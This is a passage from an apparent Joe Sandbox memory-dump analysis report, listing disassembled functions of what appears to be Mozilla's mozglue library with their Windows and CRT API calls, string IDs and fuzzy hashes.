                                                                  • Instruction Fuzzy Hash: 33A14970A047058FDB24CF29C694A9AFBF1BF49304F558AAED44A9BB00E731B945CF90
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9214C5
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9214E2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C921546
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C9215BA
                                                                  • free.MOZGLUE(?), ref: 6C9216B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                  • String ID:
                                                                  • API String ID: 1909280232-0
                                                                  • Opcode ID: f68391ecb28bca801dff13fc1894e42b2fe7b2114d4da201c4f2ea9283ece226
                                                                  • Instruction ID: 46170bd0595f97f9470254e171c26d72fe2d8430c6b399166af18de5a48334f3
                                                                  • Opcode Fuzzy Hash: f68391ecb28bca801dff13fc1894e42b2fe7b2114d4da201c4f2ea9283ece226
                                                                  • Instruction Fuzzy Hash: A6610132A047049BDB21DF24C880BDEB7B5BF9A308F44851CED8A57701EB35E959CB91
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C919FDB
                                                                  • free.MOZGLUE(?,?), ref: 6C919FF0
                                                                  • free.MOZGLUE(?,?), ref: 6C91A006
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C91A0BE
                                                                  • free.MOZGLUE(?,?), ref: 6C91A0D5
                                                                  • free.MOZGLUE(?,?), ref: 6C91A0EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID:
                                                                  • API String ID: 956590011-0
                                                                  • Opcode ID: fde293ddee5b18c5ae9c206658fb0a292d4de036c1facfece114f4300392570d
                                                                  • Instruction ID: 7b0a8bf167aacada6b9fba4ee9363bff6825751c5044f570ecfb55167bc007e2
                                                                  • Opcode Fuzzy Hash: fde293ddee5b18c5ae9c206658fb0a292d4de036c1facfece114f4300392570d
                                                                  • Instruction Fuzzy Hash: E461B275508706DFC711CF18C48156AB3F5FF89328F548669E8999BB02EB31E98ACBC1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C91DC60
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C91D38A,?), ref: 6C91DC6F
                                                                  • free.MOZGLUE(?,?,?,?,?,6C91D38A,?), ref: 6C91DCC1
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C91D38A,?), ref: 6C91DCE9
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C91D38A,?), ref: 6C91DD05
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C91D38A,?), ref: 6C91DD4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 1842996449-0
                                                                  • Opcode ID: 3ea3f086e0e4cef034b7faff8adb6c84aec29b1705b7a5f9c32ed0af1a672ac9
                                                                  • Instruction ID: 7e1a2652fc0415faf13f5cc030fde7ba25cafa51f91a4bcefb528a251b8253fd
                                                                  • Opcode Fuzzy Hash: 3ea3f086e0e4cef034b7faff8adb6c84aec29b1705b7a5f9c32ed0af1a672ac9
                                                                  • Instruction Fuzzy Hash: A6418BBAA04609DFCB00CFA9C88199AB7F6FF9D318B654569D945ABB10D731FC00CB90
                                                                  APIs
                                                                    • Part of subcall function 6C8FFA80: GetCurrentThreadId.KERNEL32 ref: 6C8FFA8D
                                                                    • Part of subcall function 6C8FFA80: AcquireSRWLockExclusive.KERNEL32(6C94F448), ref: 6C8FFA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C906727
                                                                  • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C9067C8
                                                                    • Part of subcall function 6C914290: memcpy.VCRUNTIME140(?,?,6C922003,6C920AD9,?,6C920AD9,00000000,?,6C920AD9,?,00000004,?,6C921A62,?,6C922003,?), ref: 6C9142C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                  • String ID: data
                                                                  • API String ID: 511789754-2918445923
                                                                  • Opcode ID: 97a1faef6789861fa3f9b05a1f73fdc902176ec72e518fd26417f3c389ee8f6f
                                                                  • Instruction ID: d0a51c3f0f461fc5bd0c96f973334e31d464f38eb26873d5561d830f9d8d08d0
                                                                  • Opcode Fuzzy Hash: 97a1faef6789861fa3f9b05a1f73fdc902176ec72e518fd26417f3c389ee8f6f
                                                                  • Instruction Fuzzy Hash: AAD19DB5B183408BD724DF28C851B9FB7E5AFD5308F10892DE58A87B51DB30E949CB92
                                                                  APIs
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C91C82D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C91C842
                                                                    • Part of subcall function 6C91CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C93B5EB,00000000), ref: 6C91CB12
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C91C863
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C91C875
                                                                    • Part of subcall function 6C8FB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C93B636,?), ref: 6C8FB143
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C91C89A
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C91C8BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 2745304114-0
                                                                  • Opcode ID: 0044de8390916f1db9e0c509e3366e05e975798e2b5c300ad32b3e7bc4ab4ed0
                                                                  • Instruction ID: d68e67658023b22d56a874a4408c0b4b025d5ac03b0b2c889d220e3920c877ae
                                                                  • Opcode Fuzzy Hash: 0044de8390916f1db9e0c509e3366e05e975798e2b5c300ad32b3e7bc4ab4ed0
                                                                  • Instruction Fuzzy Hash: 2F119371B082099FCB00FFA4C8D58AF7BB8EF89358B204179E61697741DB309905CBA1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C8CEB57,?,?,?,?,?,?,?,?,?), ref: 6C8FD652
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C8CEB57,?), ref: 6C8FD660
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C8CEB57,?), ref: 6C8FD673
                                                                  • free.MOZGLUE(?), ref: 6C8FD888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc
                                                                  • String ID: |Enabled
                                                                  • API String ID: 4142949111-2633303760
                                                                  • Opcode ID: 074ab044f95efde178922000a61acbf22725560aa739b067c3dad22af37ed33b
                                                                  • Instruction ID: 2d86310eade966927f86a2d9daab3de0e6cefe342a5deafdde4d4eca311a7e46
                                                                  • Opcode Fuzzy Hash: 074ab044f95efde178922000a61acbf22725560aa739b067c3dad22af37ed33b
                                                                  • Instruction Fuzzy Hash: B0A12A70A043198FDB21CF68C5807EEBBF1AF4A358F14886DD9A56B741C735E846CBA1
                                                                  APIs
                                                                  • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C8FF480
                                                                    • Part of subcall function 6C8CF100: LoadLibraryW.KERNEL32(shell32,?,6C93D020), ref: 6C8CF122
                                                                    • Part of subcall function 6C8CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C8CF132
                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C8FF555
                                                                    • Part of subcall function 6C8D14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C8D1248,6C8D1248,?), ref: 6C8D14C9
                                                                    • Part of subcall function 6C8D14B0: memcpy.VCRUNTIME140(?,6C8D1248,00000000,?,6C8D1248,?), ref: 6C8D14EF
                                                                    • Part of subcall function 6C8CEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C8CEEE3
                                                                  • CreateFileW.KERNEL32 ref: 6C8FF4FD
                                                                  • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C8FF523
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                  • String ID: \oleacc.dll
                                                                  • API String ID: 2595878907-3839883404
                                                                  • Opcode ID: 26c77291546edbb4c43fe4ac19f761a89a53dc3e5c91b9eef28fe84a232496c8
                                                                  • Instruction ID: 5922c757b10074f56f10eaab496a826df3daed57e64fcf7f2deb4e498f6d818e
                                                                  • Opcode Fuzzy Hash: 26c77291546edbb4c43fe4ac19f761a89a53dc3e5c91b9eef28fe84a232496c8
                                                                  • Instruction Fuzzy Hash: E841B4306087109FE731DF68CA84A9BB7F4AF98358F104E1CF5A483650EB34D94ACB92
                                                                  APIs
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90E047
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90E04F
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C90E09C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C90E0B0
                                                                  Strings
                                                                  • [I %d/%d] profiler_get_profile, xrefs: 6C90E057
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [I %d/%d] profiler_get_profile
                                                                  • API String ID: 1832963901-4276087706
                                                                  • Opcode ID: dcaf1212a697db5938e62f68c43252b13a7dbdf93ff043442530b623483eb891
                                                                  • Instruction ID: 6f1eef0972e9d6a3072f3991ec4fb56323f4adbd2124f122c4fc22499164dcf6
                                                                  • Opcode Fuzzy Hash: dcaf1212a697db5938e62f68c43252b13a7dbdf93ff043442530b623483eb891
                                                                  • Instruction Fuzzy Hash: 4F21CF74B05118CFDF00EF64D858AAEBBB9AF9520CF644428ED4A97740DB31E909C7E1
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C927526
                                                                  • __Init_thread_footer.LIBCMT ref: 6C927566
                                                                  • __Init_thread_footer.LIBCMT ref: 6C927597
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$ErrorLast
                                                                  • String ID: UnmapViewOfFile2$kernel32.dll
                                                                  • API String ID: 3217676052-1401603581
                                                                  • Opcode ID: 03588849eefe8ec48568ffbbf85a13cebee47984c5077e0a457450ec9f6b9a10
                                                                  • Instruction ID: e2fe230585b23af777e42f6832f9c054026a1077fdb3167bb3a7a20af9c5d233
                                                                  • Opcode Fuzzy Hash: 03588849eefe8ec48568ffbbf85a13cebee47984c5077e0a457450ec9f6b9a10
                                                                  • Instruction Fuzzy Hash: F4212531715502A7CF149FE8C814E8A737AEB87B7DF218528D84167B40C72CE806CAA1
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94F770,-00000001,?,6C93E330,?,6C8EBDF7), ref: 6C92A7AF
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C8EBDF7), ref: 6C92A7C2
                                                                  • moz_xmalloc.MOZGLUE(00000018,?,6C8EBDF7), ref: 6C92A7E4
                                                                  • LeaveCriticalSection.KERNEL32(6C94F770), ref: 6C92A80A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                  • String ID: accelerator.dll
                                                                  • API String ID: 2442272132-2426294810
                                                                  • Opcode ID: c0cfbc4c41e2cbb29c07f80891f8aeddeeca8c2998752eea81321f8ecf3da904
                                                                  • Instruction ID: 7e3ec2845860fd0fe3176b672b293dc9c285e1eda9abc1ed3a081cdfd0dbe2a7
                                                                  • Opcode Fuzzy Hash: c0cfbc4c41e2cbb29c07f80891f8aeddeeca8c2998752eea81321f8ecf3da904
                                                                  • Instruction Fuzzy Hash: 7E01A2B16143049FEB04DF99D884C167BF8FB8AB28715C06AE949CB701DB74E800CBA0
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ole32,?,6C8CEE51,?), ref: 6C8CF0B2
                                                                  • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C8CF0C2
                                                                  Strings
                                                                  • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C8CF0DC
                                                                  • ole32, xrefs: 6C8CF0AD
                                                                  • Could not find CoTaskMemFree, xrefs: 6C8CF0E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                  • API String ID: 2574300362-1578401391
                                                                  • Opcode ID: f12b4aafeb46ec573dcdab5db7701a51a9c4bfc725613ab780c386f7e92d335c
                                                                  • Instruction ID: edfa76191695168ba93b05359e6ea437d2eeb1af019aafc28bded0ae4445e0db
                                                                  • Opcode Fuzzy Hash: f12b4aafeb46ec573dcdab5db7701a51a9c4bfc725613ab780c386f7e92d335c
                                                                  • Instruction Fuzzy Hash: E1E0D87134D2469FBF246B765818A2B37B86BB350D730C82DE511C1E04EB20D020CA52
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C8D7204), ref: 6C900088
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C9000A7
                                                                  • FreeLibrary.KERNEL32(?,6C8D7204), ref: 6C9000BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                  • API String ID: 145871493-3385133079
                                                                  • Opcode ID: c57a0f550a26ecba8b031b41fec4246894effdf47b8ebeb9741f704d9aad1c39
                                                                  • Instruction ID: 87405a66f3338d4ce2e3b2dc4be26f77910d7f1b211b6e11751e5e5417ce6b41
                                                                  • Opcode Fuzzy Hash: c57a0f550a26ecba8b031b41fec4246894effdf47b8ebeb9741f704d9aad1c39
                                                                  • Instruction Fuzzy Hash: D0E07E746487069BEB00BF669808B067AF9A74B34DF60D06AA926C6750DBB5D010DB61
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C8D7235), ref: 6C9000D8
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C9000F7
                                                                  • FreeLibrary.KERNEL32(?,6C8D7235), ref: 6C90010E
                                                                  Strings
                                                                  • wintrust.dll, xrefs: 6C9000D3
                                                                  • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C9000F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                  • API String ID: 145871493-2559046807
                                                                  • Opcode ID: cd8a9cd42483ba3d41959fbb69889cde9a9b16df3e0ae3567d678b208230556f
                                                                  • Instruction ID: 45b11eeeeae565a32c0ecff000b4b5e810359db845d41a4833f3453c5c136e30
                                                                  • Opcode Fuzzy Hash: cd8a9cd42483ba3d41959fbb69889cde9a9b16df3e0ae3567d678b208230556f
                                                                  • Instruction Fuzzy Hash: 7CE0127030D70A9BEF40BF268909F277AF8A74320CF70D069AA0A85B00EBB0C0208B50
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C92C0E9), ref: 6C92C418
                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C92C437
                                                                  • FreeLibrary.KERNEL32(?,6C92C0E9), ref: 6C92C44C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                  • API String ID: 145871493-2623246514
                                                                  • Opcode ID: 308d471bd364b577cd97b161efad5565cca9761dd0eeaa033091bc8a86989c5b
                                                                  • Instruction ID: 24bff4055945481a06f0deeca5235e91dea1e4823668b0be1ccbe5819b9aee5e
                                                                  • Opcode Fuzzy Hash: 308d471bd364b577cd97b161efad5565cca9761dd0eeaa033091bc8a86989c5b
                                                                  • Instruction Fuzzy Hash: 4AE0B67060D7029BEF00BFB6CD18B177BF8A78624CF20D196AA0699741EBB4D0008B90
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C92748B,?), ref: 6C9275B8
                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C9275D7
                                                                  • FreeLibrary.KERNEL32(?,6C92748B,?), ref: 6C9275EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
